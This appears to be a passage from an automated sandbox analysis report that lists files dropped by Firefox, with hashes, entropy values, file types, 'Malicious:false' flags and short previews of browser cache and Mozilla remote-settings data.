                                                                                                                                                                                  SSDEEP:3:xShOwllZRtl3BMqEcldnX+OGTAMrRzcSLUxGTKllllln:xShNlTPRiclp+OGb9LUxGmln
                                                                                                                                                                                  MD5:6FE364DD69D62B8B9ACE2307B8CD9E6E
                                                                                                                                                                                  SHA1:ED144759CA05CFC4A7D399C26534E489567348F8
                                                                                                                                                                                  SHA-256:9CE7B41B07C7ACC5964248C8CD61CD6C21AC0E7DA4A26801C2E15B577F638115
                                                                                                                                                                                  SHA-512:477E04168DCE2C75DA1059831AA06CFCC1CE29EA1DEAB0DF6EF517CD076E8DF9467AD980861B053DB60270D6B2EB6A9EF616EFBA99F4B1437D78661053A3D396
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:z{..........e..................B....O^partitionKey=%28https%2Cyoutube.com%29,:https://www.youtube.com/.....
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):21334
                                                                                                                                                                                  Entropy (8bit):6.984269946797896
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:0bh+WVteP4/Klw97VqN4mApqN3Xo70tNo+pwPm082nyFz/a9l:qhBKlPApQHkKo+pwPo2z
                                                                                                                                                                                  MD5:9E78D58D57603E58413308A59FBEBE58
                                                                                                                                                                                  SHA1:5BD0A5BAD7881CAAF03FE5CD2EF15ABB25425E37
                                                                                                                                                                                  SHA-256:B26B3BA716829625856A54BF34CFB24E790726458947ED52D321654249817A8A
                                                                                                                                                                                  SHA-512:E774E35F263AEB242E0308B6AC77D02F51CDD0FD440CD633E2802E77D2891A4451E8DBB597BF5C6584AAC32EE3B72B3F0EA04FD65BEDCE91A0C5A5E8D8E1A5B5
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 2233860352
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):85220
                                                                                                                                                                                  Entropy (8bit):7.969208031664875
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:qTqHi79vuDzc9nakAGSUZq3ieMiZbb7O26zIjrNMkq51ej+WYHmMA3GrGkWOK:di79vununakGUZALZbb7LBMkq516QHc5
                                                                                                                                                                                  MD5:2B372FA8804989BE0705E0D59EF975A9
                                                                                                                                                                                  SHA1:7179AB7285F7C14D681897C8C5274FE00FBB8357
                                                                                                                                                                                  SHA-256:6655368C4A83CCFBAC70857C98391B3EC4BA62F4DBA4DCEA09BE8857E3DCF99D
                                                                                                                                                                                  SHA-512:725214E0B223F71D90CE748D2987ABF2EC8D8D070CE978D85DE84FF470C0FE2A7B2F49FF56519A9E80F16BC39C5F5759E943685D178ADCB62B55B222D028A41A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):9262
                                                                                                                                                                                  Entropy (8bit):6.117824387267069
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:XIYEBR3lieyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWdo+Zodo+Zi:XQ3YeLYGBRohB1r1uk/KiFTaIdaoFol
                                                                                                                                                                                  MD5:6C1D6C4EF6C69ADE619BB2E49A5861CD
                                                                                                                                                                                  SHA1:1BE693A32E431E052C2F018653E1D9357C9E3E59
                                                                                                                                                                                  SHA-256:63AEC625B6CA58A8392EA770F8B49831EC6D49BB1DCBC52CB909BE23A95CA8FF
                                                                                                                                                                                  SHA-512:B97C76B17F5EBD282CDA36794873BB70058BE27D3366698E50D2691AA233FE63DA35E03014D5AE619FBB35E0B63B2B4A6DBB36CBBC520A6B3A273266F655CC42
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"metadata":{"schema":{"type":"object","required":["firstPartyOrigin","thirdPartyOrigin"],"properties":{"firstPartyOrigin":{"type":"string","title":"firstPartyOrigin","description":"the first-party origin being used for the permission."},"thirdPartyOrigin":{"type":"string","title":"thirdPartyOrigin","description":"the third-party origin being used for the permission."}},"description":"an exempt list that partitioning will be automatically relaxed for specific origins."},"signature":{"ref":"u0mgbpz5iwxi38fzobs7wao8m","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-03-20-10-07-03.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"qWLsCicKFbULmR_a-Knb_SsvfJ06rOcoFmRaaBKNiTENkQNnv_scoZOsW10YOfmYJut1r9Ju3gnTWzm4KpP3OxjiZor6OhUAGFi3p7FMOMncHxXNs0KF1suo4YNOQZ6W","signer_id":"remote-settings","public_key":"MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE9/8sqFZ+dU3XKZO6K+T1Ez9wiWI18wv2atOP1JBioLK9RDzM+2lP3hcnmkdKPoF54BBcrrUruEYcLg7g
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, max speed, from Unix, original size modulo 2^32 4228120576
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8888
                                                                                                                                                                                  Entropy (8bit):6.666361069981275
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:8h9cQuDxLilu+rJn6yTTmWgv+ilu+rJn6yTTmWgvfNbZovzcdXY1Mld4Y1MZ:8hWDYXrHTgvFXrHTgvfAQXVH4VZ
                                                                                                                                                                                  MD5:F8F620F8EBEF1ED0FB26BC46683A07C6
                                                                                                                                                                                  SHA1:5685D2B28AEDFA97EEE867E6C17824A986A6407F
                                                                                                                                                                                  SHA-256:AE9CBA019164C6167BDF2B3B600AFDBB1FC5E42E8E0D18666C146D5BB2004C0A
                                                                                                                                                                                  SHA-512:3A7AD1263EE0E509AB2A6FB66C562F2C0EA55E5A65FA1E6346891F0BA916FCEFBE89750E8C44B9957371A45B355BB3880F8AC5A0088BF0E5277DAC084C7BA229
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 90243840
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):232192
                                                                                                                                                                                  Entropy (8bit):7.99431129071616
                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                  SSDEEP:6144:ASGZXsycPyioLDvOFQOa5Mdc2mlCuli7PaXik:7o8XPUv2Gxi4nwPaXik
                                                                                                                                                                                  MD5:0DBBA6E0E2216B002FC0D7F525E1C98C
                                                                                                                                                                                  SHA1:ECBBFEC691BFE15BE64F468E1CF78651091F3C3D
                                                                                                                                                                                  SHA-256:EF6AD5CB5021BB29404255CC4E1B6B203E334F89F89E1CB5C8C3A3E01978D06C
                                                                                                                                                                                  SHA-512:51AF00487960AC3E091A58F404FF84DB9646AC1ECB6B3CA7CDEB85AB5C905EA8D5F9C35D2B9797D2831231DB1DDE844CEE6EBD3CBF164238C73B6830F9DC06BA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8054
                                                                                                                                                                                  Entropy (8bit):6.040850304368062
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:VKMdWebgQX2GZaRZEyFYpoGAVQUy0tikpxgMIRGXpMbm5uZGebZovEckALUcuALc:TWebV2GZuZrFK0k0t7qW0NbZovEplH
                                                                                                                                                                                  MD5:3294EB9CC29E9125CBD5B32B2EA1344D
                                                                                                                                                                                  SHA1:EC101D78A3D7379265FDADA387349139E16DEA6F
                                                                                                                                                                                  SHA-256:CFAA6B433AEFAB1F9EC4BA3AC215699778E37315CA942983202622E5CE016F6D
                                                                                                                                                                                  SHA-512:DF948FD91BE995C59F7C2F625C3C8FF3BD948FC89E4E437E79ECC4110E295C0970FA2BCE6F193ACEA1B4A0EE361805FEA0C46581DED6CEA17E932C4FC159FC4E
                                                                                                                                                                                  Malicious:false
Preview:T.9.........e...e...F.A.e...........a,~1708514994,:https://incoming.telemetry.mozilla.org/submit/firefox-desktop/messaging-system/1/b38522d7-1787-4855-a312-c27916e30610.strongly-framed.1.security-info.
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 268632064
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):11650
                                                                                                                                                                                  Entropy (8bit):6.418010992174564
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:oxxlLx89q4ezOYmSmhZwTWvoglqYmSmhZwTWvogrxsMHJm4nOdAna0Axk0CvDXhj:o7lNuqFtmzwTWvoglJmzwTWvogrBHJmi
                                                                                                                                                                                  MD5:E8EE2C5B3CE17108026D3EC548A3825B
                                                                                                                                                                                  SHA1:8D8283E832E0377F81568FC403CB2FFF42A5F30A
                                                                                                                                                                                  SHA-256:E41C9F12A6DA345C87A633CC9BA46D40EACE1AF836E413F75DD7A556497D70FF
                                                                                                                                                                                  SHA-512:5A37DE7CA9D04D47711F12ABA2F856BEF09CF036C837CEF73122318F181EDFEEDD7D9B01B89B6D59F7535B18C0F9A45647632DC4B2103A3BB961EB3AADF914E7
                                                                                                                                                                                  Malicious:false
Preview:...O^partitionKey=%28https%2Cgoogle.com%29,:https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.J6zlSvuPGsg.es5.O/ck=boq-identity.AccountsSignInUi.
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8054
                                                                                                                                                                                  Entropy (8bit):6.0390561919846855
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:UMdWebgQX2GZaRZEyFYpoGAVQUy0tikpxgMIRGXpMbm5uZGebZovEck2LUcu2LU3:DWebV2GZuZrFK0k0t7qW0NbZovEprV
                                                                                                                                                                                  MD5:C1297F47C11FAAA58A3A1F985E39C7D6
                                                                                                                                                                                  SHA1:93EFBE1F2142989940B277FBAFB5F8EC027C9F6E
                                                                                                                                                                                  SHA-256:2125ED7D8C8633663D2EB2806393942A0EC6704A3D778407EEB671C042C09727
                                                                                                                                                                                  SHA-512:72EAD77ABB66B95C164FB36A6D39E3887572AD9D1CD73681B158A6F78E8101D6553F78C7181C581D6EB4ADC30D83C7EF615A0A350613836899BC8B873C6BB295
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):32390
                                                                                                                                                                                  Entropy (8bit):5.588717540412683
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:iy/K4ALv/YPxl+VRFHiUzNfw4CNxieLYGBRohB1r1uk/KiFTaIdaDqDI:iknS0z4kUzNfyxie8GvIDuuKOa8s
                                                                                                                                                                                  MD5:6D71699BFE4B1FA8A134879FBDF7A65A
                                                                                                                                                                                  SHA1:195731ECE38A3E229E30B34D521CC17381D61498
                                                                                                                                                                                  SHA-256:150E6BF128E1F18E1E7271FD3CFADED6C1C29C50AE98318CBEBCB6110B23738B
                                                                                                                                                                                  SHA-512:A1C92E71976CA2F898B06B72CCB16C83505AB3EBC4855AA622A6339E422BE04F13FCB39312C6DCFC40B99643AF56DB8A5DDB95615BCEAA3B520E7E214CCBCA6C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"metadata":{},"timestamp":1708509430155,"changes":[{"id":"0e543556-43bf-3139-1fda-2a0068116c6d","last_modified":1701990003977,"bucket":"blocklists","collection":"certificates","host":"firefox.settings.services.mozilla.com"},{"id":"19e79f22-62cf-92e1-c12c-a3b4b9cf51be","last_modified":1603126502200,"bucket":"blocklists","collection":"plugins","host":"firefox.settings.services.mozilla.com"},{"id":"b7f595f9-5fc5-d863-b5dd-e5425dcf427a","last_modified":1604940558744,"bucket":"blocklists","collection":"addons","host":"firefox.settings.services.mozilla.com"},{"id":"061d4584-acd0-fecc-b5fb-dcfe0ad5e123","last_modified":1624388514784,"bucket":"blocklists","collection":"qa","host":"firefox.settings.services.mozilla.com"},{"id":"3fadb169-e5de-a2f0-374e-6eeb3eac3dbb","last_modified":1692730580117,"bucket":"blocklists","collection":"gfx","host":"firefox.settings.services.mozilla.com"},{"id":"c521b443-368f-2e18-a853-066abaa1e9e3","last_modified":1708000561099,"bucket":"blocklists","collection":"ad
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):15844
                                                                                                                                                                                  Entropy (8bit):5.972901528432223
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:m7VqN4mApqN3Xo70tNo+pwPm082nyFz/iBY:TApQHkKo+pwPo2C
                                                                                                                                                                                  MD5:CBE0351FC76E873EC16491586802CA21
                                                                                                                                                                                  SHA1:D5F478368D65792CEFE1600B22A7C0B1D73AD26E
                                                                                                                                                                                  SHA-256:BC6DC35E0126B99B5F1B8C49FCB6A17FE989B09C02B0CB1DB53F45AF743D25DD
                                                                                                                                                                                  SHA-512:A46FD3EA895ACE389AA834AAFB6B14BDB6AB78A246A2C132CD53D42D29648BBAE3D72BCC2ADD8244D529353AA63F631C055654C8D70644ECE7DA548CF8230257
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 839319552
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):12760
                                                                                                                                                                                  Entropy (8bit):6.6981267822149455
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:+SjfqLomzwTWvoglJmzwTWvogrBHJm2OdAnAyCvDx8CvDxP:NUzSWvoI8zSWvoIBHJmvOk
                                                                                                                                                                                  MD5:0726A4BE3F5057A78F42CE762F8B3008
                                                                                                                                                                                  SHA1:F11D60AB021ECF03D71F6EF6E61C440E115F3650
                                                                                                                                                                                  SHA-256:1A0A55B9BFB20D62DD85F139C942E30943C0B3C1D2E5FA170B9E7B1B2082A795
                                                                                                                                                                                  SHA-512:912174D86798A6E2C966ED65622634C654804DDC2F700FA48C54A7BD92ECB86F905090D7B4C8848207FF7ED2CEC818AD1E3B65592B04DF646347E5C53C22E8DA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 15744, version 1.0
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):24007
                                                                                                                                                                                  Entropy (8bit):7.766896981694014
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:z1TLklSElcS5V6qQTMUP07JwirW6RlLwK79T92MtV0rAD0PTaIdNrp:p7EJ5E2bJwi5jLwK79TsMtVpD0La8/
                                                                                                                                                                                  MD5:854A568C4ECE8D7F6B91135464ABD9FC
                                                                                                                                                                                  SHA1:3813A74B71CE5E37D04AD5289647FD604AAB23EE
                                                                                                                                                                                  SHA-256:530F55949B71EDF7CDA26B1F59E0603B4F338990429ABBDA29BA7B8F53392747
                                                                                                                                                                                  SHA-512:348BECEBB3B0AD4AB33CB41C277C024CD64919DB980587161A284C1573A8B000CF04970E21B8730CE7E0E72C4FAE5E52312DB0F6EB14A6C877A81FBFE08B3FD1
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8044
                                                                                                                                                                                  Entropy (8bit):6.040561992250005
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:n0MdWebgQX2GZaRZEyFYpoGAVQUy0tikpxgMIRGXpMbm5uZGebZovEckNLUcuNLc:njWebV2GZuZrFK0k0t7qW0NbZovEpau
                                                                                                                                                                                  MD5:980C160C26DCA09716A0289639F2A276
                                                                                                                                                                                  SHA1:29ABC5C20A253FB45DC37DC2F31D0516A7867626
                                                                                                                                                                                  SHA-256:6516F0556F5FFBC8F65BEAE0FE642372318FBB44A91AE5E7DEF7951DADB421AC
                                                                                                                                                                                  SHA-512:B3CBFF4ABCCB2EB0AE89E0B07F05C25080277CA922065F517C5BFE14CD7608EC6B35A764D9BA1D423E8503EBAD50F6720589B6BF5C3057411DA20EF27FC7B26D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):13341
                                                                                                                                                                                  Entropy (8bit):5.918380210254339
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:wI6t3qWceBPG0rJ4XbfAzUUV+S0t7MVkyfXfbaI8j3qt0ww0wg:P6AW7BHrkb4XV+S0mVkEXTaIdf
                                                                                                                                                                                  MD5:8165221144DD25C8ABEFD4C9A1B2C867
                                                                                                                                                                                  SHA1:3D88C368A39ABDA9777C488D2EB0234EE7CC8414
                                                                                                                                                                                  SHA-256:B3F42EA56A68CD3D8F076ACFAAC151955032FD649E2486114F2DC533D228CCD4
                                                                                                                                                                                  SHA-512:5CCC34348F1E3E89F4085763B9DFCCE3B1D608CE1E386612B989A3CDA961F81549FF8966BFC5EF9C03E7A0103F5EC1A9B4B0352F122D84646F172F9C43BF3F06
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):15851
                                                                                                                                                                                  Entropy (8bit):6.041703573725303
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:Z37VqN4mApqN3Xo70tNo+pwPm082nyFz/aZz:ZMApQHkKo+pwPo25
                                                                                                                                                                                  MD5:8E2877E06C0778AF64B131FC0713F0C4
                                                                                                                                                                                  SHA1:DCB59931ADB2324104B0466E2CF492EA8C2529AA
                                                                                                                                                                                  SHA-256:8037D84BA5237ED643926287F76F86ACC00EBFDE33FA2A971EE85E7F7D81327E
                                                                                                                                                                                  SHA-512:FDEB9E33DC6C1B0B59EFE8B76F684C7B8CFE71F33DCA3C3703F166A1F883066FDFDE749F9A938C182477BF93B8EA299A0D95687A72513F1B4A42C1DC4170F17D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):9014
                                                                                                                                                                                  Entropy (8bit):6.11321858429258
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:pRCBzco+xweyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWdUWX7dUWXF:pRaeLYGBRohB1r1uk/KiFTaIda1J1V
                                                                                                                                                                                  MD5:EB8BAF34588F185A67485BDE9DAF24F4
                                                                                                                                                                                  SHA1:CC308C9DC1D0684C64031AEB48CF7EFDB996CD0A
                                                                                                                                                                                  SHA-256:81DD958A84C6AD537933D3D403E1BDB75EC561CEACBC80F56D3D62C9237D85B7
                                                                                                                                                                                  SHA-512:B7AF0E677592E04A4872BD38E119A12FA36E705E5B250A1AE11C4ED10E4E22B2E39DDE73C1E511DC7F0C19CB0709D327C4ED44468C8EED93A390377ED8CDFE7C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"permissions":{},"data":{"sort":"-last_modified","schema":{"type":"object","required":["name","version"],"properties":{"id":{"type":"string"},"name":{"type":"string","title":"Name","description":"The name of the language identification model"},"version":{"type":"number","title":"Version","description":"The version of the model"}}},"signature":{"ref":"ip57e54ci38236p3t263n2sbd","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-03-20-10-07-03.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"zK9RtbyDxUlnjIjsZJo8yNFPu4wDmnboozsGT0bV1ewh5kemUYhCQ3yyCCTrTaNax7ma_vhjqOnrpsfTCYeNpfURtUcMiJlzACRj6EvNXS8SxAfjWG63d-X1kCsoIc_H","signer_id":"remote-settings","public_key":"MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE9/8sqFZ+dU3XKZO6K+T1Ez9wiWI18wv2atOP1JBioLK9RDzM+2lP3hcnmkdKPoF54BBcrrUruEYcLg7gsw2EWoqGzqOXmUVf5aDVfUHQxV8aW4x3H/oT0qGFXgDFHb+t"},"attachment":{"enabled":true,"required":false},"displayFields":["name","version"],"id":"tr
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):9271
                                                                                                                                                                                  Entropy (8bit):6.117123063434393
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:mKBdn22eyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWdxjdxg:BveLYGBRohB1r1uk/KiFTaIda/G
                                                                                                                                                                                  MD5:514708490B806DFBE6B47528F23DFDEE
                                                                                                                                                                                  SHA1:1F5201B2E0597D568DAA670AF091CF29F5AC4271
                                                                                                                                                                                  SHA-256:B12ED5645C6AEA1BCD70E63DB08811C476154BB4AE23B11E63A315C0A2567290
                                                                                                                                                                                  SHA-512:0699DB483BFBAF111621B06CFF76FAAC3A0B7D397084B78E5552A2AAA4F3ED2614B407381A19972667CAA680DDE92E62D2A566424EBB3B59935991A0E4999AA0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"metadata":{"schema":{"type":"object","required":["pattern","feature"],"properties":{"feature":{"type":"string","title":"Feature","description":"Which feature this entry applies to (e.g. tracking)"},"pattern":{"type":"string","title":"Pattern","description":"Site hostname pattern to match"}},"description":"Skip list entry for URL-Classifier features"},"signature":{"ref":"f7gb49joer44oj444icke5pg","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-03-20-10-07-03.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"7oKOeBwIWvnMriJvTmMA5c029vj1mrz6Ea6KNsT10H5dG0y_Zt0cA60N8Ie9-NS1ZXkZK1QKX5VjVZpWTd7lSGHQImlzMQYJ3CZewHTDo28ezppFG-YeucsMt0cJWAER","signer_id":"remote-settings","public_key":"MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE9/8sqFZ+dU3XKZO6K+T1Ez9wiWI18wv2atOP1JBioLK9RDzM+2lP3hcnmkdKPoF54BBcrrUruEYcLg7gsw2EWoqGzqOXmUVf5aDVfUHQxV8aW4x3H/oT0qGFXgDFHb+t"},"displayFields":["pattern","feature"],"id":"url-classifier-skip-urls",
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):14644
                                                                                                                                                                                  Entropy (8bit):5.906857716046348
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:N7VqN4mApqN3Xo70tNo+pwPm082nyFz//:2ApQHkKo+pwPo2I
                                                                                                                                                                                  MD5:96241E97254D3ADA133F3717E7667138
                                                                                                                                                                                  SHA1:7BF244795AFEA5BCAD20028FB7293A2770D78D4E
                                                                                                                                                                                  SHA-256:5B77F864E259BF718667CF7CE49FA3E0AA6799A8E1F2FC576987A8DC1634B6D8
                                                                                                                                                                                  SHA-512:6F0D0271938D2082A66860867D659C02961A17D19FD1AEA0BA852BB2BF18513690AFE5D64378110C1BA040D73A841AC51208D54A4CF5328372AFDD952BFDFC1B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..RZ........e...e...F.B.e......X....O^partitionKey=%28https%2Cgoogle.com%29,:https://accounts.google.com/generate_204?E7f5BQ.necko:classified.1.strongly-framed.1.security-info.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
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 3791781888
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):11627
                                                                                                                                                                                  Entropy (8bit):6.407355174506837
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:yu8I58mq4WAcYmSmhZwTWvoglqYmSmhZwTWvogrxsMHJm4nOdAna0AxkDCvDXhwH:yBefqlymzwTWvoglJmzwTWvogrBHJm2R
                                                                                                                                                                                  MD5:722A3785FDD34731BE3D5A65AD4F59E0
                                                                                                                                                                                  SHA1:956828EBEE93B34FE92AB0987BF5DCE36EBFBC3C
                                                                                                                                                                                  SHA-256:56C3606A6F221E909729F21AA64C2C7BB966F525AB3D1ADCADF664CE8A5C1DB6
                                                                                                                                                                                  SHA-512:4A92E53BB36475C56E9C0DDD7B7467D46898E5FEDD0070B0A7776E9CFD5C45025DAE05532412B7A5D312ED27BB21CC442C4E007A51B8FFB191F5B2C877292F86
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):191
                                                                                                                                                                                  Entropy (8bit):4.982175558053957
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:D9yl/mrJZPRRl/rlljXvX3XDkySLYXqhJX8sX3uOX8sXzLWzQ//tsXzHwLf3G9Ls:hRlxLhLXDOLYX2qsH3X8sXWzgtsDH+f7
                                                                                                                                                                                  MD5:3154ADB35EDDA1F9ACC8A0E431C1E75E
                                                                                                                                                                                  SHA1:4308AA22EBD45A41364D8492703B525880EDDBA8
                                                                                                                                                                                  SHA-256:BCE4A6BF670310ED7C42B7FD37486C3AD56B120F6A85933EF0FFD7E27BFAAED3
                                                                                                                                                                                  SHA-512:21F5E846BE9054BDD1036E3ADCC2B8AA323A2E87707F5E1BF4A8531AA25343862F98BA6FEB31694AD13FFE54EF23A3C7F2C70A2CF944029AABB2DAFEE6A5C069
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:............e...e...F..........,....~predictor-origin,:https://www.facebook.com/.predictor::seen.1.predictor::resource-count.1.predictor::https://static.xx.fbcdn.net/.1,6,1708515099,4096.....
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):9331
                                                                                                                                                                                  Entropy (8bit):6.128476061613573
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:zBpduN1xT4CIeyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWdpXGdpXi:u4peLYGBRohB1r1uk/KiFTaIdap6pS
                                                                                                                                                                                  MD5:9AA3AD3979D9FA7B614EDEAF4CB7C159
                                                                                                                                                                                  SHA1:A4EAA38FD4615DB4942F353B4FA00C06E8E13CB8
                                                                                                                                                                                  SHA-256:A11CA62A50A41B91A9A970C931C80063B732B9F8618F4D69A038EFA51E320805
                                                                                                                                                                                  SHA-512:D09D9B013884600D13BF78CEDC170B5C30A16730112466D1E72321E6FDF3BCE211EBD59E6A85E91D8AB9419BBE0AF81902C3322A306B07A6F5A0EBBA6E52E41D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"metadata":{"signature":{"ref":"2xcuolhhb44h21fnnaxg95pj72","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-03-20-10-07-03.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"VDkZ-T8IDP0dBb9LIAXbvOdhi-5tRn0iyCOU42ByFBT6mxl_ItVvwcgFUAjVI3sbkJvloMWp3Unwy7e8ouCOoZ5eY4uuj8fvH1A2UMe3HFhNMkTsZekb303xHQyTy8yT","signer_id":"remote-settings","public_key":"MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE9/8sqFZ+dU3XKZO6K+T1Ez9wiWI18wv2atOP1JBioLK9RDzM+2lP3hcnmkdKPoF54BBcrrUruEYcLg7gsw2EWoqGzqOXmUVf5aDVfUHQxV8aW4x3H/oT0qGFXgDFHb+t"},"id":"cfr","last_modified":1708300804547},"timestamp":1699046525260,"changes":[{"groups":["cfr"],"content":{"text":"","layout":"short_message","buttons":{"primary":{"event":"PROTECTION","label":{"string_id":"cfr-doorhanger-milestone-ok-button"},"action":{"type":"OPEN_PROTECTION_REPORT"}},"secondary":[{"event":"DISMISS","label":{"string_id":"cfr-doorhanger-milestone-close-button"},"action":{"type":"CANCEL"}}
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
